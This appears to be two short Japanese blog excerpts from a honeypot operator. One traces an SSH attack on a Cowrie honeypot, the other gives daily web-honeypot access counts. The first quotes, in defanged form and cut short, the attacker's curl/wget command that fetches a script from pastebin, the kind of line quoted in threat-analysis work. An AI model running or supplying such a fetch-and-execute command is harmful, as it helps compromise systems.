4月3日にCowrieに来ていた攻撃を追ってみました。 一番最初にこの攻撃が観測されたのは4月2日4:48(JST)となります。sshでログインし、以下のコマンドを入力していました。 (curl -fsSL hxxps://pastebin[.]com/raw/v5XC0BJh||wget -q -O- hxxps://pastebin[]…

本日の総アクセス件数は594件です。送信元IP数は77IPです。"GET /" のような単なるアクセスと思われる通信が55IPから来ました。 内訳の多くは、日本リージョンに属するAWS上の4IPから、 計280回、UAがGo-http-clientの通信でした。 何かのテストでもしていた…